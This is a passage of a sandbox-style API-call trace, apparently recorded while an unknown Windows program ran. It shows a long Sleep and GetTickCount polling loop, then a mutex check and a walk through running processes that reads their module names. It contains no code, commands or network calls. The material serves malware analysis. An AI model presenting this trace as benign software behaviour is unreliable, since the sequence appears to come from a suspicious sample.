[0202.053] GetCurrentProcessId () returned 0xa38 [0202.053] CoFreeUnusedLibraries () [0202.053] GetTickCount () returned 0x3813f [0202.053] GetTickCount () returned 0x3813f [0202.053] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.053] Sleep (dwMilliseconds=0x0) [0202.099] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.100] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.100] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.100] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11629ee [0202.100] GetTickCount () returned 0x3816e [0202.100] GetLastError () returned 0x578 [0202.100] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.100] GetCurrentProcessId () returned 0xa38 [0202.100] CoFreeUnusedLibraries () [0202.100] GetTickCount () returned 0x3816e [0202.100] GetTickCount () returned 0x3816e [0202.100] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.100] Sleep (dwMilliseconds=0x0) [0202.161] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.162] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.162] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.162] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162a2d [0202.162] GetTickCount () returned 0x381ad [0202.162] GetLastError () returned 0x578 [0202.162] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.162] GetCurrentProcessId () returned 0xa38 [0202.162] CoFreeUnusedLibraries () [0202.162] GetTickCount () returned 0x381ad [0202.162] GetTickCount () returned 0x381ad [0202.162] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.162] Sleep (dwMilliseconds=0x0) [0202.208] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.208] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.208] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.208] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162a5b [0202.209] GetTickCount () returned 0x381db [0202.209] GetLastError () returned 0x578 [0202.209] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.209] GetCurrentProcessId () returned 0xa38 [0202.209] CoFreeUnusedLibraries () [0202.209] GetTickCount () returned 0x381db [0202.209] GetTickCount () returned 0x381db [0202.209] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.209] Sleep (dwMilliseconds=0x0) [0202.255] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.256] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.256] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.256] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162a8a [0202.256] GetTickCount () returned 0x3820a [0202.256] GetLastError () returned 0x578 [0202.256] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.256] GetCurrentProcessId () returned 0xa38 [0202.256] CoFreeUnusedLibraries () [0202.256] GetTickCount () returned 0x3820a [0202.256] GetTickCount () returned 0x3820a [0202.256] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.256] Sleep (dwMilliseconds=0x0) [0202.301] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.302] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.302] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.302] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162ab9 [0202.302] GetTickCount () returned 0x38239 [0202.302] GetLastError () returned 0x578 [0202.302] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.302] GetCurrentProcessId () returned 0xa38 [0202.302] CoFreeUnusedLibraries () [0202.303] GetTickCount () returned 0x38239 [0202.303] GetTickCount () returned 0x38239 [0202.303] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.303] Sleep (dwMilliseconds=0x0) [0202.414] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.414] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.414] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.414] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162af7 [0202.414] GetTickCount () returned 0x38277 [0202.415] GetLastError () returned 0x578 [0202.415] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.415] GetCurrentProcessId () returned 0xa38 [0202.415] CoFreeUnusedLibraries () [0202.415] GetTickCount () returned 0x38277 [0202.415] GetTickCount () returned 0x38277 [0202.415] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.415] Sleep (dwMilliseconds=0x0) [0202.458] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.459] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.459] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.459] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162b26 [0202.459] GetTickCount () returned 0x382a6 [0202.459] GetLastError () returned 0x578 [0202.459] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.459] GetCurrentProcessId () returned 0xa38 [0202.459] CoFreeUnusedLibraries () [0202.459] GetTickCount () returned 0x382a6 [0202.459] GetTickCount () returned 0x382a6 [0202.459] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.459] Sleep (dwMilliseconds=0x0) [0202.505] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.506] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.506] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.506] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162b55 [0202.506] GetTickCount () returned 0x382d5 [0202.506] GetLastError () returned 0x578 [0202.506] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.506] GetCurrentProcessId () returned 0xa38 [0202.506] CoFreeUnusedLibraries () [0202.506] GetTickCount () returned 0x382d5 [0202.506] GetTickCount () returned 0x382d5 [0202.506] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.506] Sleep (dwMilliseconds=0x0) [0202.551] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.552] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.552] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.552] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162b84 [0202.552] GetTickCount () returned 0x38304 [0202.552] GetLastError () returned 0x578 [0202.552] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.552] GetCurrentProcessId () returned 0xa38 [0202.552] CoFreeUnusedLibraries () [0202.552] GetTickCount () returned 0x38304 [0202.552] GetTickCount () returned 0x38304 [0202.552] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.552] Sleep (dwMilliseconds=0x0) [0202.598] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.599] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.599] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.599] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162bb3 [0202.599] GetTickCount () returned 0x38333 [0202.599] GetLastError () returned 0x578 [0202.599] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.599] GetCurrentProcessId () returned 0xa38 [0202.599] CoFreeUnusedLibraries () [0202.599] GetTickCount () returned 0x38333 [0202.599] GetTickCount () returned 0x38333 [0202.599] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.599] Sleep (dwMilliseconds=0x0) [0202.676] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.676] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.676] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.676] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162c01 [0202.676] GetTickCount () returned 0x38381 [0202.677] GetLastError () returned 0x578 [0202.677] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.677] GetCurrentProcessId () returned 0xa38 [0202.677] CoFreeUnusedLibraries () [0202.677] GetTickCount () returned 0x38381 [0202.677] GetTickCount () returned 0x38381 [0202.677] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.677] Sleep (dwMilliseconds=0x0) [0202.723] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.724] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.724] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.724] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162c2f [0202.724] GetTickCount () returned 0x383af [0202.724] GetLastError () returned 0x578 [0202.724] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.724] GetCurrentProcessId () returned 0xa38 [0202.724] CoFreeUnusedLibraries () [0202.724] GetTickCount () returned 0x383af [0202.724] GetTickCount () returned 0x383af [0202.724] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.724] Sleep (dwMilliseconds=0x0) [0202.769] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.770] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.770] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.770] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162c5e [0202.770] GetTickCount () returned 0x383de [0202.770] GetLastError () returned 0x578 [0202.770] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.770] GetCurrentProcessId () returned 0xa38 [0202.770] CoFreeUnusedLibraries () [0202.771] GetTickCount () returned 0x383de [0202.771] GetTickCount () returned 0x383de [0202.771] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.771] Sleep (dwMilliseconds=0x0) [0202.817] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.817] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.817] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.817] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162c8d [0202.817] GetTickCount () returned 0x3840d [0202.817] GetLastError () returned 0x578 [0202.817] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.817] GetCurrentProcessId () returned 0xa38 [0202.818] CoFreeUnusedLibraries () [0202.818] GetTickCount () returned 0x3840d [0202.818] GetTickCount () returned 0x3840d [0202.818] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.818] Sleep (dwMilliseconds=0x0) [0202.863] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.864] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.864] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.864] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162cbc [0202.864] GetTickCount () returned 0x3843c [0202.864] GetLastError () returned 0x578 [0202.864] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.864] GetCurrentProcessId () returned 0xa38 [0202.864] CoFreeUnusedLibraries () [0202.864] GetTickCount () returned 0x3843c [0202.864] GetTickCount () returned 0x3843c [0202.864] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.864] Sleep (dwMilliseconds=0x0) [0202.910] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.911] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.911] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.911] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162ceb [0202.911] GetTickCount () returned 0x3846b [0202.911] GetLastError () returned 0x578 [0202.911] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.911] GetCurrentProcessId () returned 0xa38 [0202.911] CoFreeUnusedLibraries () [0202.911] GetTickCount () returned 0x3846b [0202.911] GetTickCount () returned 0x3846b [0202.911] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.911] Sleep (dwMilliseconds=0x0) [0204.329] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0204.330] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0204.330] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0204.330] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162d39 [0204.330] GetTickCount () returned 0x384b9 [0204.330] GetLastError () returned 0x578 [0204.330] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0204.330] GetCurrentProcessId () returned 0xa38 [0204.331] CoFreeUnusedLibraries () [0204.331] GetTickCount () returned 0x384b9 [0204.331] GetTickCount () returned 0x384b9 [0204.331] IsWindowVisible (hWnd=0x7028c) returned 0 [0204.331] Sleep (dwMilliseconds=0x0) [0204.394] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0204.395] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0204.395] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0204.395] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162d77 [0204.395] GetTickCount () returned 0x384f7 [0204.395] GetLastError () returned 0x578 [0204.395] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0204.395] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f0 | out: ppsaOut=0x18f8f0) returned 0x0 [0204.396] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0204.396] SafeArrayDestroyDescriptor (psa=0x380f098) returned 0x0 [0204.396] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0204.396] SafeArrayDestroyDescriptor (psa=0x380f098) returned 0x0 [0204.396] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0204.396] SafeArrayDestroyDescriptor (psa=0x380f098) returned 0x0 [0204.396] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0204.396] SafeArrayDestroyDescriptor (psa=0x380f098) returned 0x0 [0204.396] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x110 [0204.396] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x110 [0204.396] GetLastError () returned 0x578 [0204.396] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0204.396] SafeArrayAllocDescriptorEx (in: vt=0x3, cDims=0x1, ppsaOut=0x18f8f4 | out: ppsaOut=0x18f8f4) returned 0x0 [0204.396] EnumProcesses (in: lpidProcess=0x380f050, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lpidProcess=0x380f050, lpcbNeeded=0x18f8e8) returned 1 [0204.397] GetLastError () returned 0x0 [0204.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0204.397] GetLastError () returned 0x57 [0204.397] CloseHandle (hObject=0x0) returned 0 [0204.397] GetLastError () returned 0x6 [0204.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0204.397] GetLastError () returned 0x5 [0204.397] CloseHandle (hObject=0x0) returned 0 [0204.398] GetLastError () returned 0x6 [0204.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0204.398] GetLastError () returned 0x5 [0204.398] CloseHandle (hObject=0x0) returned 0 [0204.398] GetLastError () returned 0x6 [0204.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0204.398] GetLastError () returned 0x5 [0204.398] CloseHandle (hObject=0x0) returned 0 [0204.398] GetLastError () returned 0x6 [0204.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0204.398] GetLastError () returned 0x5 [0204.398] CloseHandle (hObject=0x0) returned 0 [0204.398] GetLastError () returned 0x6 [0204.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0204.398] GetLastError () returned 0x5 [0204.398] CloseHandle (hObject=0x0) returned 0 [0204.398] GetLastError () returned 0x6 [0204.398] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0204.398] GetLastError () returned 0x5 [0204.398] CloseHandle (hObject=0x0) returned 0 [0204.399] GetLastError () returned 0x6 [0204.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0204.399] GetLastError () returned 0x5 [0204.399] CloseHandle (hObject=0x0) returned 0 [0204.399] GetLastError () returned 0x6 [0204.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0204.399] GetLastError () returned 0x5 [0204.399] CloseHandle (hObject=0x0) returned 0 [0204.399] GetLastError () returned 0x6 [0204.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0204.399] GetLastError () returned 0x5 [0204.399] CloseHandle (hObject=0x0) returned 0 [0204.399] GetLastError () returned 0x6 [0204.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0204.399] GetLastError () returned 0x5 [0204.399] CloseHandle (hObject=0x0) returned 0 [0204.399] GetLastError () returned 0x6 [0204.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x29c) returned 0x0 [0204.399] GetLastError () returned 0x5 [0204.399] CloseHandle (hObject=0x0) returned 0 [0204.399] GetLastError () returned 0x6 [0204.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0204.399] GetLastError () returned 0x5 [0204.399] CloseHandle (hObject=0x0) returned 0 [0204.399] GetLastError () returned 0x6 [0204.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0204.399] GetLastError () returned 0x5 [0204.399] CloseHandle (hObject=0x0) returned 0 [0204.399] GetLastError () returned 0x6 [0204.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0204.400] GetLastError () returned 0x5 [0204.400] CloseHandle (hObject=0x0) returned 0 [0204.400] GetLastError () returned 0x6 [0204.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0204.400] GetLastError () returned 0x5 [0204.400] CloseHandle (hObject=0x0) returned 0 [0204.400] GetLastError () returned 0x6 [0204.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0204.400] GetLastError () returned 0x5 [0204.400] CloseHandle (hObject=0x0) returned 0 [0204.400] GetLastError () returned 0x6 [0204.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x39c) returned 0x10c [0204.400] GetLastError () returned 0x6 [0204.400] SafeArrayAllocDescriptorEx (in: vt=0x3, cDims=0x1, ppsaOut=0x18f8f0 | out: ppsaOut=0x18f8f0) returned 0x0 [0204.400] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0204.400] GetLastError () returned 0x12b [0204.400] CloseHandle (hObject=0x10c) returned 1 [0204.400] GetLastError () returned 0x12b [0204.400] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x110) returned 0x10c [0204.400] GetLastError () returned 0x12b [0204.400] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0204.401] GetLastError () returned 0x12b [0204.401] CloseHandle (hObject=0x10c) returned 1 [0204.401] GetLastError () returned 0x12b [0204.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x440) returned 0x0 [0204.401] GetLastError () returned 0x5 [0204.401] CloseHandle (hObject=0x0) returned 0 [0204.401] GetLastError () returned 0x6 [0204.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x0 [0204.401] GetLastError () returned 0x5 [0204.401] CloseHandle (hObject=0x0) returned 0 [0204.401] GetLastError () returned 0x6 [0204.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x10c [0204.401] GetLastError () returned 0x6 [0204.401] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0204.401] GetLastError () returned 0x12b [0204.401] CloseHandle (hObject=0x10c) returned 1 [0204.401] GetLastError () returned 0x12b [0204.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x0 [0204.401] GetLastError () returned 0x5 [0204.401] CloseHandle (hObject=0x0) returned 0 [0204.401] GetLastError () returned 0x6 [0204.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x548) returned 0x10c [0204.402] GetLastError () returned 0x6 [0204.402] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0204.402] GetLastError () returned 0x12b [0204.402] CloseHandle (hObject=0x10c) returned 1 [0204.402] GetLastError () returned 0x12b [0204.402] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a0) returned 0x0 [0204.402] GetLastError () returned 0x5 [0204.402] CloseHandle (hObject=0x0) returned 0 [0204.402] GetLastError () returned 0x6 [0204.402] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x624) returned 0x0 [0204.402] GetLastError () returned 0x5 [0204.402] CloseHandle (hObject=0x0) returned 0 [0204.402] GetLastError () returned 0x6 [0204.402] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x730) returned 0x10c [0204.402] GetLastError () returned 0x6 [0204.402] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.403] GetLastError () returned 0x0 [0204.404] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x850000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="easily.exe") returned 0xa [0204.404] GetLastError () returned 0x0 [0204.404] SysStringByteLen (bstr="慥楳祬攮數") returned 0x104 [0204.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.404] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.405] GetLastError () returned 0x0 [0204.406] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xb70000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="stockportsconvenient.exe") returned 0x18 [0204.406] GetLastError () returned 0x0 [0204.406] SysStringByteLen (bstr="瑳捯火牯獴潣癮湥敩瑮攮數") returned 0x104 [0204.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.406] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.407] GetLastError () returned 0x0 [0204.407] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x920000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="dangerous.exe") returned 0xd [0204.412] GetLastError () returned 0x0 [0204.412] SysStringByteLen (bstr="慤杮牥畯⹳硥e") returned 0x104 [0204.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.412] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.413] GetLastError () returned 0x0 [0204.413] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x2b0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="retained_one_psychology.exe") returned 0x1b [0204.414] GetLastError () returned 0x0 [0204.414] SysStringByteLen (bstr="敲慴湩摥潟敮灟祳档汯杯⹹硥e") returned 0x104 [0204.414] MultiByteToWideChar (in: CodePage=0x0, 